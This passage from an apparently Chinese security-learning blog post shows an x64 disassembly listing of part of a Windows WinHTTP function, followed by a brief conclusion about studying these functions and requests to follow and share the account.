00007FF8456A6258 F6 05 43 0C 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A625F 0F 85 69 2F 05 00 jne CStringTemplate<char>::SetString+0C3E0h (07FF8456F91CEh)
00007FF8456A6265 48 C7 45 BF 00 00 00 00 mov qword ptr [rbp-41h],0
00007FF8456A626D 85 DB test ebx,ebx
00007FF8456A626F 0F 85 4B 01 00 00 jne WinHttpSetStatusCallback+5B0h (07FF8456A63C0h)
00007FF8456A6275 F6 05 24 0C 10 00 02 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],2
00007FF8456A627C 48 8B BC 24 B0 00 00 00 mov rdi,qword ptr [rsp+0B0h]
00007FF8456A6284 0F 85 78 2F 05 00 jne CStringTemplate<char>::SetString+0C414h (07FF8456F9202h)
00007FF8456A628A 83 7D DF 00 cmp dword ptr [rbp-21h],0
00007FF8456A628E 74 2A je WinHttpSetStatusCallback+4AAh (07FF8456A62BAh)
00007FF8456A6290 48 8D 55 CF lea rdx,[rbp-31h]
00007FF8456A6294 C7 45 AB 00 00 00 00 mov dword ptr [rbp-55h],0
00007FF8456A629B B9 02 00 00 00 mov ecx,2
00007FF8456A62A0 48 FF 15 71 A9 0D 00 call qword ptr [__imp_EventActivityIdControl (07FF845780C18h)]
00007FF8456A62A7 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A62AC 85 C0 test eax,eax
00007FF8456A62AE 0F 8F 69 2F 05 00 jg CStringTemplate<char>::SetString+0C42Fh (07FF8456F921Dh)
00007FF8456A62B4 0F 88 72 2F 05 00 js CStringTemplate<char>::SetString+0C43Eh (07FF8456F922Ch)
00007FF8456A62BA 8B CB mov ecx,ebx
00007FF8456A62BC 48 FF 15 E5 A1 0D 00 call qword ptr [__imp_SetLastError (07FF8457804A8h)]
00007FF8456A62C3 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A62C8 48 8B 45 B7 mov rax,qword ptr [rbp-49h]
00007FF8456A62CC 48 8B 9C 24 08 01 00 00 mov rbx,qword ptr [rsp+108h]
00007FF8456A62D4 48 8B 4D 17 mov rcx,qword ptr [rbp+17h]
00007FF8456A62D8 48 33 CC xor rcx,rsp
00007FF8456A62DB E8 60 D8 03 00 call __security_check_cookie (07FF8456E3B40h)
00007FF8456A62E0 48 81 C4 B8 00 00 00 add rsp,0B8h
00007FF8456A62E7 41 5F pop r15
00007FF8456A62E9 41 5E pop r14
00007FF8456A62EB 41 5D pop r13
00007FF8456A62ED 41 5C pop r12
00007FF8456A62EF 5E pop rsi
00007FF8456A62F0 5D pop rbp
00007FF8456A62F1 C3 ret
3.总结
这次主要也是学习,加上对一些函数学习,只有不断学习积累才行嘛
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论